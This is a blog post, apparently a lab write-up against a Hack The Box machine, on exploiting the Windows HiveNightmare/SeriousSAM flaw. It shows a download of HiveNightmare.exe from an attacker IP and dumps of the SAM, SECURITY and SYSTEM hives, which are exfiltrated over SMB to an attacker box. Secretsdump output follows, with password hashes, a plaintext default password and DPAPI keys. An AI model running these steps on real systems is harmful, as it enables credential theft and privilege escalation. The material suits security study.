526互联

Windows Escalate Privilege HiveNightmare/SeriousSAM

发布时间 2024-01-09 11:53:21作者: lisenMiller

Briefly

Microsoft ensure that a new local escalate loophole.

This loophole allow low permission user access the system file of Windows.

The user which successfully utiliz the loophole can execute any code as SYSTEM.

Examing the vulnerability 

If output BUILTIN\Users:(I)(RX) means the system is vulnerable.

icacls C:\windows\system32\config\sam
C:\windows\system32\config\SAM BUILTIN\Administrators:(I)(F) 
NT AUTHORITY\SYSTEM:(I)(F) 
BUILTIN\Users:(I)(RX) 
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) 
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) 
Successfully processed 1 files; Failed processing 0 files

If output Access is denid or refuse access means the system is not vulnerable.

Get Hive Files

Using HiveNightmare.exe 

PS C:\ProgramData> iwr http://10.10.14.5:8888/HiveNightmare.xe -outfile HN.exe
PS C:\ProgramData> ./HN.exe 

HiveNightmare v0.6 - dump registry hives as non-admin users

Specify maximum number of shadows to inspect with parameter if wanted, default is 15.

Running...

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM

Success: SAM hive from 2022-08-02 written out to current working directory as SAM-2022-08-02

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SECURITY

Success: SECURITY hive from 2022-08-02 written out to current working directory as SECURITY-2022-08-02

Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM

Success: SYSTEM hive from 2022-08-02 written out to current working directory as SYSTEM-2022-08-02


Assuming no errors above, you should be able to find hive dump files in current working directory.

It does create copies of the hives in the current directory.

PS C:\ProgramData> ls
    Directory: C:\ProgramData

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         6/15/2022   6:30 PM           Microsoft
d-----         6/15/2022   9:24 AM           Microsoft OneDrive
d-----         6/15/2022   9:40 AM           Packages
d-----          8/1/2022   7:41 PM           regid.1991-06.com.microsoft
d-----         12/7/2019   1:14 AM           SoftwareDistribution
d-----          4/9/2021   6:54 AM           ssh
d-----         6/15/2022   9:53 AM           USOPrivate
d-----         12/7/2019   1:14 AM           USOShared
-a----          8/3/2022   2:10 PM         227328 hn.exe
-a----          8/3/2022   2:08 PM          45272 nc64.exe
-a----          8/3/2022   2:10 PM          65536 SAM-2022-08-02
-a----          8/3/2022   2:10 PM          32768 SECURITY-2022-08-02
-a----          8/3/2022   2:10 PM       11534336 SYSTEM-2022-08-02

Exfil

To exfil these ,I'll start an SMB server on my box and transport the hives file.

kali

impacket-smbserver share . -smb2support -username Lisen -password miller

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

box

net use \\10.10.14.5\Share /u:lisen miller
copy *-08-02 \\10.10.14.5\Share

Dump Hashes

With access to these hives,secretsdump.py will return the hashes;

oxdf@hacky$ secretsdump.py -sam SAM-2022-08-02 -security SECURITY-2022-08-02 -system SYSTEM-2022-08-02 local
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x0e2bd3cb19e8aa5c74f4b9161423a373
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cadef52f10f56e21d9f4934c4d5bf813:::
[*] Dumping cached domain logon information (domain/username:hash)
OUTDATED.HTB/btables:$DCC2$10240#btables#91e9188a93c8b59479cbe490e22fc790
OUTDATED.HTB/Administrator:$DCC2$10240#Administrator#fcf452603a2e8ee8f65158c73469cf7e
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:f80410e1c92e55a7b058b888deeea7ed6ef3d062adf879d2abea86cc1c9974379269f6f444d300aadd4882920353b5df37ddab7d9e8376019d5722a5cd48005550870d1c9d8874ced04570a3708bbcda4989dcba159fdde308481d37ef68c8831221caf06cf57e9b1b504f7a7e9a2bbe6b9ff88046763e7b9b1e1ed949dbc9a1abeba6be717a68225f8893d0e8fbe7aebc9e57d34b9f4b040d6a1213762ae93a07157e76054e1ebc9dfc74c59fd89e18c789985cadf5e97e42ac8b3c64bef8681fdb387c801044ccdeea39f4f034419ee68259554060d9687393a0f4af9f98e88999e55c24f79cb92b5f96c1babfbb3c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:c57f6ab8490903d04597f6ff606fc58b
[*] DefaultPassword 
(Unknown User):5myBPLPDKT3Bfq
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x76a645f1d5e5879a07eb92ccc767cbe8bf5d8219
dpapi_userkey:0x8225e352fcf823af35757bacff4cdfe98c73db8f
[*] NL$KM 
 0000   08 4C 51 0B 9B 09 ED C8  4D 12 A0 47 40 5B 64 2D   .LQ.....M..G@[d-
 0010   32 3C AC B5 E2 42 0E 41  76 99 DE D7 20 E6 15 B9   2<...B.Av... ...
 0020   79 57 B8 29 D2 5D 44 91  3F D5 84 76 BE 00 D2 00   yW.).]D.?..v....
 0030   16 8B 85 3D 3F 17 27 1F  16 4F C0 37 64 6E 44 E5   ...=?.'..O.7dnD.
NL$KM:084c510b9b09edc84d12a047405b642d323cacb5e2420e417699ded720e615b97957b829d25d44913fd58476be00d200168b853d3f17271f164fc037646e44e5
[*] Cleaning up...